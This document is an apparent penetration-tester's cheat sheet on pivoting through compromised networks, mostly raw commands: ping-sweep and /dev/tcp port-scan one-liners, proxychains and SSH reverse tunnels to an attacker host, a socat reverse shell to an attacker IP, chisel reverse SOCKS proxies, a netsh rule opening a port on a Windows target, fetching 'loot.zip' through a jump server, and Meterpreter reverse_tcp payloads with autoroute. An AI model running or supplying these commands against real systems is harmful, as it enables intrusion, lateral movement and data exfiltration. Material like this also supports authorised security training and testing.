6.3 KiB
6.3 KiB
Pivoting
- Tunnelling/Proxying
- Port Forwarding
Enumeration
Using material found on the machine and preinstalled tools
arp -a
/etc/hosts
orC:\Windows\System32\drivers\etc\hosts
/etc/resolv.conf
ipconfig /all
nmcli dev show
- Statically compiled tools
Scripting Techniques
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
- Using local tools through a proxy like
nmap
Tools
- Enumerating a network using native and statically compiled tools
Proxychains / FoxyProxy
- In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
ssh <username>@$ATTACKER_IP -R 9050 -N
- Proxychains, e.g. scan target via nmap, or connect via nc through jump server
proxychains nc <IP> <PORT> proychains nmap <IP> proxychains ssh user@$TARGET_IP proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS proxychains wget http://$TARGET_IP:8000/loot.zip
- Use
/etc/proxychains.conf
or./proxychains.conf
containing:
[ProxyList] # add proxy here ... # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 #socks5 127.0.0.1 1337 # proxy_dns
- Use
- FoxyProxy, choose proxy type, proxy IP and port in settings
SSH port forwarding and tunnelling (primarily Unix)
-
LocalPortForwarding
ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
- Another possibility to use the jumpserver directly on it's cli via
ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N
. One can connect now to the target via the jumpserver - Tip: open port on windows target via
netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
- Another possibility to use the jumpserver directly on it's cli via
-
Dynamic Port Forwarding
ssh -D $PORT <user>@<Jumpserver> -fN
-
Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
- Tip1: create a user on the attacker to receive the connection without compromising your own password
- Tip2: use
-N
to not receive an interactive shell. The attacking user does not necessarily have one on the target
plink.exe (Windows)
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
- Key generation
puttygen <keyfile> -o key.ppk
- Circumvention, described by U.Y.
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
Socat
-
Reverse shell on target via
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
- Attacking bind shell
sudo nc -lvnp 443
-
Relay on jumpserver via
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
-
Quiet Port Forwarding
- On attacker
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
- On relay server
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
- Open
localhost:8000
-
Processes are backgrounded via
&
. Therefore, the process can be quit by using the corresponding bg number likekill %1
. -
In need of a Download on target, expose a port on the attacker via relay
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
Chisel
-
Does not require SSH on target
-
Reverse Proxy
- Bind port on attacker
./chisel server -p <ListeningPort> --reverse &
- Reverse port on target/proxy
./chisel client <attacker-IP>:<attacker-Port> R:socks &
proxychains.conf
contains
[ProxyList] socks5 127.0.0.1 <Listening-Port>
-
Forward SOCKS Proxy
- Proxy/compromised machine
./chisel server -p <Listen-Port> --socks5
- On attacker
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
-
Remote Port Forward
- On attacker
./chisel server -p <Listen-Port> --reverse &
- On forwarder
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
-
Local Port Forwarding
- On proxy
./chisel server -p <Listen-Port>
- On attacker
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
sshuttle
pip install sshuttle
sshuttle -r <user>@<target> <subnet/CIDR>
- or automatically determined
sshuttle -r <user>@<target> -N
- Key based auth
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
- Exclude servers via
-x
, for example the target/gateway server
Meterpreter
- Meterpreter with payload
set payload linux/x64/meterpreter_reverse_tcp
after successful connection do
portfwd add -l 22 -p 22 -r 127.0.0.1
Meterpreter add Subnet Route
run get_local_subnets
background
route add 10.1.1.0 255.255.255.0 1
route add 172.10.0.1/32 -1
route print
- Or use
load auto_add_route
from rapid7's documentation
Meterpreter Auto Routing
- Upload payload and catch it with
multi/handler
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run
Meterpreter Proxy Routing
- Specify socks proxy via
use auxiliary/server/socks_proxy
- Set proxychain on attacker accordingly
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11